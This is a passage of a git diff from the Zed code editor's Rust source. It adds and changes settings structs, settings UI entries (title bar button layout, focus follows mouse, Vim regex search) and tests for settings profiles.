things sound for you. - #[serde(rename = "experimental.auto_speaker_volume")] - pub auto_speaker_volume: Option, - /// Requires 'rodio_audio: true' - /// /// Remove background noises. Works great for typing, cars, dogs, AC. Does /// not work well on music. - #[serde(rename = "experimental.denoise")] - pub denoise: Option, - /// Requires 'rodio_audio: true' - /// - /// Use audio parameters compatible with the previous versions of - /// experimental audio and non-experimental audio. When this is false you - /// will sound strange to anyone not on the latest experimental audio. In - /// the future we will migrate by setting this to false - /// - /// You need to rejoin a call for this setting to apply - #[serde(rename = "experimental.legacy_audio_compatible")] - pub legacy_audio_compatible: Option, - /// Requires 'rodio_audio: true' - /// /// Select specific output audio device. #[serde(rename = "experimental.output_audio_device")] pub output_audio_device: Option, - /// Requires 'rodio_audio: true' - /// /// Select specific input audio device. #[serde(rename = "experimental.input_audio_device")] pub input_audio_device: Option, @@ -542,22 +513,6 @@ pub enum DockPosition { Right, } -/// Settings for slash commands. -#[with_fallible_options] -#[derive(Deserialize, Serialize, Debug, Default, Clone, JsonSchema, MergeFrom, PartialEq, Eq)] -pub struct SlashCommandSettings { - /// Settings for the `/cargo-workspace` slash command. - pub cargo_workspace: Option, -} - -/// Settings for the `/cargo-workspace` slash command. -#[with_fallible_options] -#[derive(Deserialize, Serialize, Debug, Default, Clone, JsonSchema, MergeFrom, PartialEq, Eq)] -pub struct CargoWorkspaceCommandSettings { - /// Whether `/cargo-workspace` is enabled. - pub enabled: Option, -} - /// Configuration of voice calls in Zed. #[with_fallible_options] #[derive(Clone, PartialEq, Default, Serialize, Deserialize, JsonSchema, MergeFrom, Debug)] @@ -593,6 +548,17 @@ pub struct GitPanelSettingsContent { /// /// Default: icon pub status_style: Option, + + /// Whether to show file icons in the git panel. + /// + /// Default: false + pub file_icons: Option, + + /// Whether to show folder icons or chevrons for directories in the git panel. + /// + /// Default: true + pub folder_icons: Option, + /// How and when the scrollbar should be displayed. /// /// Default: inherits editor scrollbar settings @@ -622,8 +588,18 @@ pub struct GitPanelSettingsContent { /// Whether to show the addition/deletion change count next to each file in the Git panel. /// - /// Default: false + /// Default: true pub diff_stats: Option, + + /// Whether to show a badge on the git panel icon with the count of uncommitted changes. + /// + /// Default: false + pub show_count_badge: Option, + + /// Whether the git panel should open on startup. + /// + /// Default: false + pub starts_open: Option, } #[derive( @@ -671,6 +647,10 @@ pub struct NotificationPanelSettingsContent { /// Default: 300 #[serde(serialize_with = "crate::serialize_optional_f32_with_two_decimal_places")] pub default_width: Option, + /// Whether to show a badge on the notification panel icon with the count of unread notifications. + /// + /// Default: false + pub show_count_badge: Option, } #[with_fallible_options] @@ -721,6 +701,10 @@ pub struct FileFinderSettingsContent { /// /// Default: Smart pub include_ignored: Option, + /// Whether to include text channels in file finder results. + /// + /// Default: false + pub include_channels: Option, } #[derive( @@ -779,6 +763,7 @@ pub struct VimSettingsContent { pub toggle_relative_line_numbers: Option, pub use_system_clipboard: Option, pub use_smartcase_find: Option, + pub use_regex_search: Option, /// When enabled, the `:substitute` command replaces all matches in a line /// by default. The 'g' flag then toggles this behavior., pub gdefault: Option, @@ -1069,6 +1054,8 @@ pub struct DevContainerConnection { pub remote_user: String, pub container_id: String, pub use_podman: bool, + pub extension_ids: Vec, + pub remote_env: BTreeMap, } #[with_fallible_options] @@ -1148,11 +1135,6 @@ pub struct ReplSettingsContent { /// /// Default: 0 pub output_max_height_lines: Option, - /// Maximum number of columns of output to display before scaling images. - /// Set to 0 to disable output width limits. - /// - /// Default: 0 - pub output_max_width_columns: Option, } /// Settings for configuring the which-key popup behaviour. @@ -1168,15 +1150,15 @@ pub struct WhichKeySettingsContent { pub delay_ms: Option, } +// An ExtendingVec in the settings can only accumulate new values. +// +// This is useful for things like private files where you only want +// to allow new values to be added. +// +// Consider using a HashMap instead of this type +// (like auto_install_extensions) so that user settings files can both add +// and remove values from the set. #[derive(Default, Debug, Clone, PartialEq, Serialize, Deserialize, JsonSchema)] -/// An ExtendingVec in the settings can only accumulate new values. -/// -/// This is useful for things like private files where you only want -/// to allow new values to be added. -/// -/// Consider using a HashMap instead of this type -/// (like auto_install_extensions) so that user settings files can both add -/// and remove values from the set. pub struct ExtendingVec(pub Vec); impl Into> for ExtendingVec { @@ -1196,10 +1178,10 @@ impl merge_from::MergeFrom for ExtendingVec { } } -/// A SaturatingBool in the settings can only ever be set to true, -/// later attempts to set it to false will be ignored. -/// -/// Used by `disable_ai`. +// A SaturatingBool in the settings can only ever be set to true, +// later attempts to set it to false will be ignored. +// +// Used by `disable_ai`. #[derive(Debug, Default, Copy, Clone, PartialEq, Serialize, Deserialize, JsonSchema)] pub struct SaturatingBool(pub bool); diff --git a/crates/settings_content/src/terminal.rs b/crates/settings_content/src/terminal.rs index a13613badfaa0a375dbcbdf6424e7bda59a84dc4..643dea18d106906d242ff21d0aadbc27492fd09b 100644 --- a/crates/settings_content/src/terminal.rs +++ b/crates/settings_content/src/terminal.rs @@ -129,6 +129,10 @@ pub struct TerminalSettingsContent { /// Default: true pub button: Option, pub dock: Option, + /// Whether the terminal panel should use flexible (proportional) sizing. + /// + /// Default: true + pub flexible: Option, /// Default width when the terminal is docked to the left or right. /// /// Default: 640 @@ -171,6 +175,10 @@ pub struct TerminalSettingsContent { /// Default: 45 #[serde(serialize_with = "crate::serialize_optional_f32_with_two_decimal_places")] pub minimum_contrast: Option, + /// Whether to show a badge on the terminal panel icon with the count of open terminals. + /// + /// Default: false + pub show_count_badge: Option, } /// Shell configuration to open the terminal with. diff --git a/crates/settings_content/src/title_bar.rs b/crates/settings_content/src/title_bar.rs new file mode 100644 index 0000000000000000000000000000000000000000..af5e30f361c7603aba72de3b5734ae78ab366171 --- /dev/null +++ b/crates/settings_content/src/title_bar.rs @@ -0,0 +1,124 @@ +use gpui::WindowButtonLayout; +use schemars::{JsonSchema, Schema, SchemaGenerator, json_schema}; +use serde::{Deserialize, Serialize}; +use settings_macros::{MergeFrom, with_fallible_options}; + +/// The layout of window control buttons as represented by user settings. +/// +/// Custom layout strings use the GNOME `button-layout` format (e.g. +/// `"close:minimize,maximize"`). +#[derive( + Clone, + PartialEq, + Debug, + Serialize, + Deserialize, + JsonSchema, + MergeFrom, + Default, + strum::EnumDiscriminants, +)] +#[strum_discriminants(derive(strum::VariantArray, strum::VariantNames, strum::FromRepr))] +#[schemars(schema_with = "window_button_layout_schema")] +#[serde(from = "String", into = "String")] +pub enum WindowButtonLayoutContent { + /// Follow the system/desktop configuration. + #[default] + PlatformDefault, + /// Use Zed's built-in standard layout, regardless of system config. + Standard, + /// A raw GNOME-style layout string. + Custom(String), +} + +impl WindowButtonLayoutContent { + #[cfg(any(target_os = "linux", target_os = "freebsd"))] + pub fn into_layout(self) -> Option { + use util::ResultExt; + + match self { + Self::PlatformDefault => None, + Self::Standard => Some(WindowButtonLayout::linux_default()), + Self::Custom(layout) => WindowButtonLayout::parse(&layout).log_err(), + } + } + + #[cfg(not(any(target_os = "linux", target_os = "freebsd")))] + pub fn into_layout(self) -> Option { + None + } +} + +fn window_button_layout_schema(_: &mut SchemaGenerator) -> Schema { + json_schema!({ + "anyOf": [ + { "enum": ["platform_default", "standard"] }, + { "type": "string" } + ] + }) +} + +impl From for String { + fn from(value: WindowButtonLayoutContent) -> Self { + match value { + WindowButtonLayoutContent::PlatformDefault => "platform_default".to_string(), + WindowButtonLayoutContent::Standard => "standard".to_string(), + WindowButtonLayoutContent::Custom(s) => s, + } + } +} + +impl From for WindowButtonLayoutContent { + fn from(layout_string: String) -> Self { + match layout_string.as_str() { + "platform_default" => Self::PlatformDefault, + "standard" => Self::Standard, + _ => Self::Custom(layout_string), + } + } +} + +#[with_fallible_options] +#[derive(Clone, PartialEq, Default, Serialize, Deserialize, JsonSchema, MergeFrom, Debug)] +pub struct TitleBarSettingsContent { + /// Whether to show the branch icon beside branch switcher in the title bar. + /// + /// Default: false + pub show_branch_icon: Option, + /// Whether to show onboarding banners in the title bar. + /// + /// Default: true + pub show_onboarding_banner: Option, + /// Whether to show user avatar in the title bar. + /// + /// Default: true + pub show_user_picture: Option, + /// Whether to show the branch name button in the titlebar. + /// + /// Default: true + pub show_branch_name: Option, + /// Whether to show the project host and name in the titlebar. + /// + /// Default: true + pub show_project_items: Option, + /// Whether to show the sign in button in the title bar. + /// + /// Default: true + pub show_sign_in: Option, + /// Whether to show the user menu button in the title bar. + /// + /// Default: true + pub show_user_menu: Option, + /// Whether to show the menus in the title bar. + /// + /// Default: false + pub show_menus: Option, + /// The layout of window control buttons in the title bar (Linux only). + /// + /// This can be set to "platform_default" to follow the system configuration, or + /// "standard" to use Zed's built-in layout. For custom layouts, use a + /// GNOME-style layout string like "close:minimize,maximize". + /// + /// Default: "platform_default" + pub button_layout: Option, +} diff --git a/crates/settings_content/src/workspace.rs b/crates/settings_content/src/workspace.rs index 7262a83b384665b0bcd868bf14dbfaa2928a35c1..0bae7c260f6607f2015f750e5bb9dec7cc26342d 100644 --- a/crates/settings_content/src/workspace.rs +++ b/crates/settings_content/src/workspace.rs @@ -6,8 +6,8 @@ use serde::{Deserialize, Serialize}; use settings_macros::{MergeFrom, with_fallible_options}; use crate::{ - CenteredPaddingSettings, DelayMs, DockPosition, DockSide, InactiveOpacity, - ScrollbarSettingsContent, ShowIndentGuides, serialize_optional_f32_with_two_decimal_places, + CenteredPaddingSettings, DelayMs, DockPosition, DockSide, InactiveOpacity, ShowIndentGuides, + ShowScrollbar, serialize_optional_f32_with_two_decimal_places, }; #[with_fallible_options] @@ -122,6 +122,9 @@ pub struct WorkspaceSettingsContent { /// What draws window decorations/titlebar, the client application (Zed) or display server /// Default: client pub window_decorations: Option, + /// Whether the focused panel follows the mouse location + /// Default: false + pub focus_follows_mouse: Option, } #[with_fallible_options] @@ -434,6 +437,10 @@ pub struct StatusBarSettingsContent { /// Default: true #[serde(rename = "experimental.show")] pub show: Option, + /// Whether to show the name of the active file in the status bar. + /// + /// Default: false + pub show_active_file: Option, /// Whether to display the active language button in the status bar. /// /// Default: true @@ -710,7 +717,7 @@ pub struct ProjectPanelSettingsContent { /// Default: true pub starts_open: Option, /// Scrollbar-related settings - pub scrollbar: Option, + pub scrollbar: Option, /// Which files containing diagnostic errors/warnings to mark in the project panel. /// /// Default: all @@ -741,8 +748,12 @@ pub struct ProjectPanelSettingsContent { pub sort_mode: Option, /// Whether to show error and warning count badges next to file names in the project panel. /// - /// Default: true + /// Default: false pub diagnostic_badges: Option, + /// Whether to show a git status indicator next to file names in the project panel. + /// + /// Default: false + pub git_status_indicator: Option, } #[derive( @@ -793,6 +804,23 @@ pub enum ProjectPanelSortMode { FilesFirst, } +#[with_fallible_options] +#[derive( + Copy, Clone, Debug, Serialize, Deserialize, JsonSchema, MergeFrom, PartialEq, Eq, Default, +)] +pub struct ProjectPanelScrollbarSettingsContent { + /// When to show the scrollbar in the project panel. + /// + /// Default: inherits editor scrollbar settings + pub show: Option, + /// Whether to allow horizontal scrolling in the project panel. + /// When false, the view is locked to the leftmost position and + /// long file names are clipped. + /// + /// Default: true + pub horizontal_scroll: Option, +} + #[with_fallible_options] #[derive( Copy, Clone, Debug, Serialize, Deserialize, JsonSchema, MergeFrom, PartialEq, Eq, Default, @@ -903,3 +931,10 @@ impl DocumentSymbols { self == &Self::On } } + +#[with_fallible_options] +#[derive(Copy, Clone, PartialEq, Default, Serialize, Deserialize, JsonSchema, MergeFrom, Debug)] +pub struct FocusFollowsMouse { + pub enabled: Option, + pub debounce_ms: Option, +} diff --git a/crates/settings_json/Cargo.toml b/crates/settings_json/Cargo.toml index 2ba9887ca016b645bafa2974bbd9029373348838..aeaf5ec3c16a9c0d0fc6e9be047fb33a4ab74373 100644 --- a/crates/settings_json/Cargo.toml +++ b/crates/settings_json/Cargo.toml @@ -27,9 +27,3 @@ serde_path_to_error.workspace = true [dev-dependencies] unindent.workspace = true pretty_assertions.workspace = true - -# Uncomment other workspace dependencies as needed -# assistant.workspace = true -# client.workspace = true -# project.workspace = true -# settings.workspace = true diff --git a/crates/settings_profile_selector/Cargo.toml b/crates/settings_profile_selector/Cargo.toml index 23ccac2e43dec6c1ab335eeb2ffb4d9159d85859..2e4608672847b608e2f6b0c48c5122bf76f3b5e7 100644 --- a/crates/settings_profile_selector/Cargo.toml +++ b/crates/settings_profile_selector/Cargo.toml @@ -22,13 +22,12 @@ workspace.workspace = true zed_actions.workspace = true [dev-dependencies] -client = { workspace = true, features = ["test-support"] } editor = { workspace = true, features = ["test-support"] } gpui = { workspace = true, features = ["test-support"] } -language = { workspace = true, features = ["test-support"] } menu.workspace = true project = { workspace = true, features = ["test-support"] } serde_json.workspace = true settings = { workspace = true, features = ["test-support"] } theme = { workspace = true, features = ["test-support"] } +theme_settings.workspace = true workspace = { workspace = true, features = ["test-support"] } diff --git a/crates/settings_profile_selector/src/settings_profile_selector.rs b/crates/settings_profile_selector/src/settings_profile_selector.rs index 7ca91e3767efb6b550af7887e70a0187fed6daad..c273a08ce7427880a02cb375561aaaade2607b83 100644 --- a/crates/settings_profile_selector/src/settings_profile_selector.rs +++ b/crates/settings_profile_selector/src/settings_profile_selector.rs @@ -286,12 +286,12 @@ mod tests { use project::{FakeFs, Project}; use serde_json::json; use settings::Settings; - use theme::{self, ThemeSettings}; + use theme_settings::ThemeSettings; use workspace::{self, AppState, MultiWorkspace}; use zed_actions::settings_profile_selector; async fn init_test( - profiles_json: serde_json::Value, + user_settings_json: serde_json::Value, cx: &mut TestAppContext, ) -> (Entity, &mut VisualTestContext) { cx.update(|cx| { @@ -299,7 +299,7 @@ mod tests { let settings_store = SettingsStore::test(cx); cx.set_global(settings_store); settings::init(cx); - theme::init(theme::LoadThemes::JustBase, cx); + theme_settings::init(theme::LoadThemes::JustBase, cx); super::init(cx); editor::init(cx); state @@ -307,13 +307,8 @@ mod tests { cx.update(|cx| { SettingsStore::update_global(cx, |store, cx| { - let settings_json = json!({ - "buffer_font_size": 10.0, - "profiles": profiles_json, - }); - store - .set_user_settings(&settings_json.to_string(), cx) + .set_user_settings(&user_settings_json.to_string(), cx) .unwrap(); }); }); @@ -328,7 +323,6 @@ mod tests { cx.update(|_, cx| { assert!(!cx.has_global::()); - assert_eq!(ThemeSettings::get_global(cx).buffer_font_size(cx), px(10.0)); }); (workspace, cx) @@ -354,15 +348,22 @@ mod tests { let classroom_and_streaming_profile_name = "Classroom / Streaming".to_string(); let demo_videos_profile_name = "Demo Videos".to_string(); - let profiles_json = json!({ - classroom_and_streaming_profile_name.clone(): { - "buffer_font_size": 20.0, - }, - demo_videos_profile_name.clone(): { - "buffer_font_size": 15.0 + let user_settings_json = json!({ + "buffer_font_size": 10.0, + "profiles": { + classroom_and_streaming_profile_name.clone(): { + "settings": { + "buffer_font_size": 20.0, + } + }, + demo_videos_profile_name.clone(): { + "settings": { + "buffer_font_size": 15.0 + } + } } }); - let (workspace, cx) = init_test(profiles_json.clone(), cx).await; + let (workspace, cx) = init_test(user_settings_json, cx).await; cx.dispatch_action(settings_profile_selector::Toggle); let picker = active_settings_profile_picker(&workspace, cx); @@ -575,24 +576,134 @@ mod tests { }); } + #[gpui::test] + async fn test_settings_profile_with_user_base(cx: &mut TestAppContext) { + let user_settings_json = json!({ + "buffer_font_size": 10.0, + "profiles": { + "Explicit User": { + "base": "user", + "settings": { + "buffer_font_size": 20.0 + } + }, + "Implicit User": { + "settings": { + "buffer_font_size": 20.0 + } + } + } + }); + let (workspace, cx) = init_test(user_settings_json, cx).await; + + // Select "Explicit User" (index 1) — profile applies on top of user settings. + cx.dispatch_action(settings_profile_selector::Toggle); + let picker = active_settings_profile_picker(&workspace, cx); + cx.dispatch_action(SelectNext); + + picker.read_with(cx, |picker, cx| { + assert_eq!( + picker.delegate.selected_profile_name.as_deref(), + Some("Explicit User") + ); + assert_eq!(ThemeSettings::get_global(cx).buffer_font_size(cx), px(20.0)); + }); + + cx.dispatch_action(Confirm); + + // Select "Implicit User" (index 2) — no base specified, same behavior. + cx.dispatch_action(settings_profile_selector::Toggle); + let picker = active_settings_profile_picker(&workspace, cx); + cx.dispatch_action(SelectNext); + + picker.read_with(cx, |picker, cx| { + assert_eq!( + picker.delegate.selected_profile_name.as_deref(), + Some("Implicit User") + ); + assert_eq!(ThemeSettings::get_global(cx).buffer_font_size(cx), px(20.0)); + }); + + cx.dispatch_action(Confirm); + } + + #[gpui::test] + async fn test_settings_profile_with_default_base(cx: &mut TestAppContext) { + let user_settings_json = json!({ + "buffer_font_size": 10.0, + "profiles": { + "Clean Slate": { + "base": "default" + }, + "Custom on Defaults": { + "base": "default", + "settings": { + "buffer_font_size": 30.0 + } + } + } + }); + let (workspace, cx) = init_test(user_settings_json, cx).await; + + // User has buffer_font_size: 10, factory default is 15. + cx.update(|_, cx| { + assert_eq!(ThemeSettings::get_global(cx).buffer_font_size(cx), px(10.0)); + }); + + // "Clean Slate" has base: "default" with no settings overrides, + // so we get the factory default (15), not the user's value (10). + cx.dispatch_action(settings_profile_selector::Toggle); + let picker = active_settings_profile_picker(&workspace, cx); + cx.dispatch_action(SelectNext); + + picker.read_with(cx, |picker, cx| { + assert_eq!( + picker.delegate.selected_profile_name.as_deref(), + Some("Clean Slate") + ); + assert_eq!(ThemeSettings::get_global(cx).buffer_font_size(cx), px(15.0)); + }); + + // "Custom on Defaults" has base: "default" with buffer_font_size: 30, + // so the profile's override (30) applies on top of the factory default, + // not on top of the user's value (10). + cx.dispatch_action(SelectNext); + + picker.read_with(cx, |picker, cx| { + assert_eq!( + picker.delegate.selected_profile_name.as_deref(), + Some("Custom on Defaults") + ); + assert_eq!(ThemeSettings::get_global(cx).buffer_font_size(cx), px(30.0)); + }); + + cx.dispatch_action(Confirm); + + cx.update(|_, cx| { + assert_eq!(ThemeSettings::get_global(cx).buffer_font_size(cx), px(30.0)); + }); + } + #[gpui::test] async fn test_settings_profile_selector_is_in_user_configuration_order( cx: &mut TestAppContext, ) { // Must be unique names (HashMap) - let profiles_json = json!({ - "z": {}, - "e": {}, - "d": {}, - " ": {}, - "r": {}, - "u": {}, - "l": {}, - "3": {}, - "s": {}, - "!": {}, + let user_settings_json = json!({ + "profiles": { + "z": { "settings": {} }, + "e": { "settings": {} }, + "d": { "settings": {} }, + " ": { "settings": {} }, + "r": { "settings": {} }, + "u": { "settings": {} }, + "l": { "settings": {} }, + "3": { "settings": {} }, + "s": { "settings": {} }, + "!": { "settings": {} }, + } }); - let (workspace, cx) = init_test(profiles_json.clone(), cx).await; + let (workspace, cx) = init_test(user_settings_json, cx).await; cx.dispatch_action(settings_profile_selector::Toggle); let picker = active_settings_profile_picker(&workspace, cx); diff --git a/crates/settings_ui/Cargo.toml b/crates/settings_ui/Cargo.toml index 399534b968dfba941d17e2f6ce76261ca4e71859..0228f6886fc741505ffbe02fe82242d5f3e1dfd4 100644 --- a/crates/settings_ui/Cargo.toml +++ b/crates/settings_ui/Cargo.toml @@ -28,6 +28,7 @@ cpal.workspace = true edit_prediction.workspace = true edit_prediction_ui.workspace = true editor.workspace = true +feature_flags.workspace = true fs.workspace = true futures.workspace = true fuzzy.workspace = true @@ -53,26 +54,21 @@ shell_command_parser.workspace = true strum.workspace = true telemetry.workspace = true theme.workspace = true +theme_settings.workspace = true ui.workspace = true util.workspace = true workspace.workspace = true zed_actions.workspace = true +zed_credentials_provider.workspace = true [dev-dependencies] -assets.workspace = true -client.workspace = true fs = { workspace = true, features = ["test-support"] } futures.workspace = true gpui = { workspace = true, features = ["test-support"] } -language.workspace = true -node_runtime.workspace = true paths.workspace = true pretty_assertions.workspace = true project = { workspace = true, features = ["test-support"] } -recent_projects = { workspace = true, features = ["test-support"] } serde_json.workspace = true -session.workspace = true settings = { workspace = true, features = ["test-support"] } title_bar = { workspace = true, features = ["test-support"] } workspace = { workspace = true, features = ["test-support"] } -zlog.workspace = true diff --git a/crates/settings_ui/src/components/input_field.rs b/crates/settings_ui/src/components/input_field.rs index e0acfe486d31db373a5de43aa64e1b6e28ce78cf..35e63078c154dd324c8dd622b8d98c2de36beb68 100644 --- a/crates/settings_ui/src/components/input_field.rs +++ b/crates/settings_ui/src/components/input_field.rs @@ -3,7 +3,7 @@ use std::rc::Rc; use editor::Editor; use gpui::{AnyElement, ElementId, Focusable, TextStyleRefinement}; use settings::Settings as _; -use theme::ThemeSettings; +use theme_settings::ThemeSettings; use ui::{Tooltip, prelude::*, rems}; #[derive(IntoElement)] diff --git a/crates/settings_ui/src/page_data.rs b/crates/settings_ui/src/page_data.rs index afc84a9f9b91e32f3a110e19dc78db5634369458..9978832c05bb29c97f118fccbe301214d81fa0c6 100644 --- a/crates/settings_ui/src/page_data.rs +++ b/crates/settings_ui/src/page_data.rs @@ -1,3 +1,4 @@ +use feature_flags::{AgentV2FeatureFlag, FeatureFlagAppExt as _}; use gpui::{Action as _, App}; use itertools::Itertools as _; use settings::{ @@ -74,7 +75,7 @@ pub(crate) fn settings_data(cx: &App) -> Vec { terminal_page(), version_control_page(), collaboration_page(), - ai_page(), + ai_page(cx), network_page(), ] } @@ -410,9 +411,9 @@ fn appearance_page() -> SettingsPage { settings::ThemeSelection::Static(_) => return, settings::ThemeSelection::Dynamic { mode, light, dark } => { match mode { - theme::ThemeAppearanceMode::Light => light.clone(), - theme::ThemeAppearanceMode::Dark => dark.clone(), - theme::ThemeAppearanceMode::System => dark.clone(), // no cx, can't determine correct choice + theme_settings::ThemeAppearanceMode::Light => light.clone(), + theme_settings::ThemeAppearanceMode::Dark => dark.clone(), + theme_settings::ThemeAppearanceMode::System => dark.clone(), // no cx, can't determine correct choice } }, }; @@ -580,9 +581,9 @@ fn appearance_page() -> SettingsPage { settings::IconThemeSelection::Static(_) => return, settings::IconThemeSelection::Dynamic { mode, light, dark } => { match mode { - theme::ThemeAppearanceMode::Light => light.clone(), - theme::ThemeAppearanceMode::Dark => dark.clone(), - theme::ThemeAppearanceMode::System => dark.clone(), // no cx, can't determine correct choice + theme_settings::ThemeAppearanceMode::Light => light.clone(), + theme_settings::ThemeAppearanceMode::Dark => dark.clone(), + theme_settings::ThemeAppearanceMode::System => dark.clone(), // no cx, can't determine correct choice } }, }; @@ -801,7 +802,8 @@ fn appearance_page() -> SettingsPage { } settings::BufferLineHeightDiscriminants::Custom => { let custom_value = - theme::BufferLineHeight::from(*settings_value).value(); + theme_settings::BufferLineHeight::from(*settings_value) + .value(); settings::BufferLineHeight::Custom(custom_value) } }; @@ -1293,17 +1295,13 @@ fn keymap_page() -> SettingsPage { fn modal_editing_section() -> [SettingsPageItem; 3] { [ SettingsPageItem::SectionHeader("Modal Editing"), - // todo(settings_ui): Vim/Helix Mode should be apart of one type because it's undefined - // behavior to have them both enabled at the same time SettingsPageItem::SettingItem(SettingItem { title: "Vim Mode", description: "Enable Vim mode and key bindings.", field: Box::new(SettingField { json_path: Some("vim_mode"), pick: |settings_content| settings_content.vim_mode.as_ref(), - write: |settings_content, value| { - settings_content.vim_mode = value; - }, + write: write_vim_mode, }), metadata: None, files: USER, @@ -1314,9 +1312,7 @@ fn keymap_page() -> SettingsPage { field: Box::new(SettingField { json_path: Some("helix_mode"), pick: |settings_content| settings_content.helix_mode.as_ref(), - write: |settings_content, value| { - settings_content.helix_mode = value; - }, + write: write_helix_mode, }), metadata: None, files: USER, @@ -1478,7 +1474,7 @@ fn editor_page() -> SettingsPage { ] } - fn multibuffer_section() -> [SettingsPageItem; 6] { + fn multibuffer_section() -> [SettingsPageItem; 7] { [ SettingsPageItem::SectionHeader("Multibuffer"), SettingsPageItem::SettingItem(SettingItem { @@ -1558,6 +1554,21 @@ fn editor_page() -> SettingsPage { metadata: None, files: USER, }), + SettingsPageItem::SettingItem(SettingItem { + title: "Minimum Split Diff Width", + description: "The minimum width (in columns) at which the split diff view is used. When the editor is narrower, the diff view automatically switches to unified mode. Set to 0 to disable.", + field: Box::new(SettingField { + json_path: Some("minimum_split_diff_width"), + pick: |settings_content| { + settings_content.editor.minimum_split_diff_width.as_ref() + }, + write: |settings_content, value| { + settings_content.editor.minimum_split_diff_width = value; + }, + }), + metadata: None, + files: USER, + }), ] } @@ -2436,7 +2447,7 @@ fn editor_page() -> SettingsPage { ] } - fn vim_settings_section() -> [SettingsPageItem; 12] { + fn vim_settings_section() -> [SettingsPageItem; 13] { [ SettingsPageItem::SectionHeader("Vim"), SettingsPageItem::SettingItem(SettingItem { @@ -2545,6 +2556,24 @@ fn editor_page() -> SettingsPage { metadata: None, files: USER, }), + SettingsPageItem::SettingItem(SettingItem { + title: "Regex Search", + description: "Use regex search by default in Vim search.", + field: Box::new(SettingField { + json_path: Some("vim.use_regex_search"), + pick: |settings_content| { + settings_content.vim.as_ref()?.use_regex_search.as_ref() + }, + write: |settings_content, value| { + settings_content + .vim + .get_or_insert_default() + .use_regex_search = value; + }, + }), + metadata: None, + files: USER, + }), SettingsPageItem::SettingItem(SettingItem { title: "Cursor Shape - Normal Mode", description: "Cursor shape for normal mode.", @@ -3332,7 +3361,7 @@ fn search_and_files_page() -> SettingsPage { } fn window_and_layout_page() -> SettingsPage { - fn status_bar_section() -> [SettingsPageItem; 9] { + fn status_bar_section() -> [SettingsPageItem; 10] { [ SettingsPageItem::SectionHeader("Status Bar"), SettingsPageItem::SettingItem(SettingItem { @@ -3477,10 +3506,32 @@ fn window_and_layout_page() -> SettingsPage { metadata: None, files: USER, }), + SettingsPageItem::SettingItem(SettingItem { + title: "Active File Name", + description: "Show the name of the active file in the status bar.", + field: Box::new(SettingField { + json_path: Some("status_bar.show_active_file"), + pick: |settings_content| { + settings_content + .status_bar + .as_ref()? + .show_active_file + .as_ref() + }, + write: |settings_content, value| { + settings_content + .status_bar + .get_or_insert_default() + .show_active_file = value; + }, + }), + metadata: None, + files: USER, + }), ] } - fn title_bar_section() -> [SettingsPageItem; 9] { + fn title_bar_section() -> [SettingsPageItem; 10] { [ SettingsPageItem::SectionHeader("Title Bar"), SettingsPageItem::SettingItem(SettingItem { @@ -3647,6 +3698,122 @@ fn window_and_layout_page() -> SettingsPage { metadata: None, files: USER, }), + SettingsPageItem::DynamicItem(DynamicItem { + discriminant: SettingItem { + files: USER, + title: "Button Layout", + description: + "(Linux only) choose how window control buttons are laid out in the titlebar.", + field: Box::new(SettingField { + json_path: Some("title_bar.button_layout$"), + pick: |settings_content| { + Some( + &dynamic_variants::()[settings_content + .title_bar + .as_ref()? + .button_layout + .as_ref()? + .discriminant() + as usize], + ) + }, + write: |settings_content, value| { + let Some(value) = value else { + settings_content + .title_bar + .get_or_insert_default() + .button_layout = None; + return; + }; + + let current_custom_layout = settings_content + .title_bar + .as_ref() + .and_then(|title_bar| title_bar.button_layout.as_ref()) + .and_then(|button_layout| match button_layout { + settings::WindowButtonLayoutContent::Custom(layout) => { + Some(layout.clone()) + } + _ => None, + }); + + let button_layout = match value { + settings::WindowButtonLayoutContentDiscriminants::PlatformDefault => { + settings::WindowButtonLayoutContent::PlatformDefault + } + settings::WindowButtonLayoutContentDiscriminants::Standard => { + settings::WindowButtonLayoutContent::Standard + } + settings::WindowButtonLayoutContentDiscriminants::Custom => { + settings::WindowButtonLayoutContent::Custom( + current_custom_layout.unwrap_or_else(|| { + "close:minimize,maximize".to_string() + }), + ) + } + }; + + settings_content + .title_bar + .get_or_insert_default() + .button_layout = Some(button_layout); + }, + }), + metadata: None, + }, + pick_discriminant: |settings_content| { + Some( + settings_content + .title_bar + .as_ref()? + .button_layout + .as_ref()? + .discriminant() as usize, + ) + }, + fields: dynamic_variants::() + .into_iter() + .map(|variant| match variant { + settings::WindowButtonLayoutContentDiscriminants::PlatformDefault => { + vec![] + } + settings::WindowButtonLayoutContentDiscriminants::Standard => vec![], + settings::WindowButtonLayoutContentDiscriminants::Custom => vec![ + SettingItem { + files: USER, + title: "Custom Button Layout", + description: + "GNOME-style layout string such as \"close:minimize,maximize\".", + field: Box::new(SettingField { + json_path: Some("title_bar.button_layout"), + pick: |settings_content| match settings_content + .title_bar + .as_ref()? + .button_layout + .as_ref()? + { + settings::WindowButtonLayoutContent::Custom(layout) => { + Some(layout) + } + _ => DEFAULT_EMPTY_STRING, + }, + write: |settings_content, value| { + settings_content + .title_bar + .get_or_insert_default() + .button_layout = value + .map(settings::WindowButtonLayoutContent::Custom); + }, + }), + metadata: Some(Box::new(SettingsFieldMetadata { + placeholder: Some("close:minimize,maximize"), + ..Default::default() + })), + }, + ], + }) + .collect(), + }), ] } @@ -4010,7 +4177,7 @@ fn window_and_layout_page() -> SettingsPage { ] } - fn layout_section() -> [SettingsPageItem; 4] { + fn layout_section() -> [SettingsPageItem; 6] { [ SettingsPageItem::SectionHeader("Layout"), SettingsPageItem::SettingItem(SettingItem { @@ -4074,6 +4241,52 @@ fn window_and_layout_page() -> SettingsPage { }), metadata: None, }), + SettingsPageItem::SettingItem(SettingItem { + title: "Focus Follows Mouse", + description: "Whether to change focus to a pane when the mouse hovers over it.", + field: Box::new(SettingField { + json_path: Some("focus_follows_mouse.enabled"), + pick: |settings_content| { + settings_content + .workspace + .focus_follows_mouse + .as_ref() + .and_then(|s| s.enabled.as_ref()) + }, + write: |settings_content, value| { + settings_content + .workspace + .focus_follows_mouse + .get_or_insert_default() + .enabled = value; + }, + }), + metadata: None, + files: USER, + }), + SettingsPageItem::SettingItem(SettingItem { + title: "Focus Follows Mouse Debounce ms", + description: "Amount of time to wait before changing focus.", + field: Box::new(SettingField { + json_path: Some("focus_follows_mouse.debounce_ms"), + pick: |settings_content| { + settings_content + .workspace + .focus_follows_mouse + .as_ref() + .and_then(|s| s.debounce_ms.as_ref()) + }, + write: |settings_content, value| { + settings_content + .workspace + .focus_follows_mouse + .get_or_insert_default() + .debounce_ms = value; + }, + }), + metadata: None, + files: USER, + }), ] } @@ -4238,7 +4451,7 @@ fn window_and_layout_page() -> SettingsPage { } fn panels_page() -> 